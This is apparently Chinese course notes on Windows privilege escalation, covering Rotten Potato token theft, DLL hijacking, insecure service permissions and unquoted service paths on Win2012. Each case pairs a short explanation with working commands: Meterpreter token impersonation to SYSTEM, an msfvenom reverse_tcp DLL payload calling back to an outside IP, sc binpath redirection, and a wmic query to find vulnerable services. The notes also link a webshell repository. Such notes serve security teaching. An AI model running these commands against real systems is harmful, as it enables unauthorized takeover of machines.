权限提升-烂土豆&dll劫持&引号路径&服务权限



必备知识点：
#令牌窃取配合烂土豆提权
单纯令牌窃取：Web权限或本地提权
如配合烂土豆提权：Web或数据库等权限

不带引号服务路径安全问题
服务路径提权：Web权限或本地提权

不安全的服务权限配置问题
服务权限配置：Web权限或本地提权(Web几率小)

补充说明：dll劫持提权及AlwaysInstallElevated等说明
dll劫持提权需要特定软件应用的控制权限及启用配合，复杂鸡肋
AlwaysInstallElevated提权默认禁用配置，利用成功机会很少
演示案例：

• Win2012-烂土豆配合令牌窃取提权-Web权限
• Win2012-DLL劫持提权应用配合MSF-Web权限
• Win2012-不安全的服务权限配合MSF-本地权限
• Win2012-不带引号服务路径配合MSF-Web,本地权限
• 关于Windows相关知识点总结说明-权限层,系统层,防护层等

案例1：Win2012-烂土豆配合令牌窃取提权-Web权限
原理：参考上述图片内容，非服务类用户权限无法窃取成功(原理)
过程：上传烂土豆-执行烂土豆-利用窃取模块-窃取SYSTEM-成功
upload /root/potato.exe C:\Users\Public
cd C:\Users\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM”

案例2：Win2012-DLL劫持提权应用配合MSF-Web权限
原理：Windows程序启动的时候需要DLL。如果这些DLL 不存在，则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常，Windows应用程序有其预定义好的搜索DLL的路径，它会根据下面的顺序进行搜索：
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory，CWD
6、在PATH环境变量的目录（先系统后用户）
过程：信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll

案例3：Win2012-不安全的服务权限配合MSF-本地权限
原理：即使正确引用了服务路径，也可能存在其他漏洞。由于管理配置错误，用户可能对服务拥有过多的权限，例如，可以直接修改它导致重定向执行文件。
过程：检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功
accesschk.exe -uwcqv “administrators” *
sc config “NewServiceName” binpath=”C:\Program.exe”
sc start “NewServiceName”

案例4：Win2012-不带引号服务路径配合MSF-Web,本地权限
原理：当Windows服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。
过程：检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功
wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\“ |findstr /i /v “””

总结Windows提权知识点：
掌握：提权方法对应层面，提权方法对应系统版本，相关文件及后门免杀问题等
涉及资源：
https://github.com/tennc/webshell
https://www.sdbeta.com/wg/2020/0628/235361.html
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075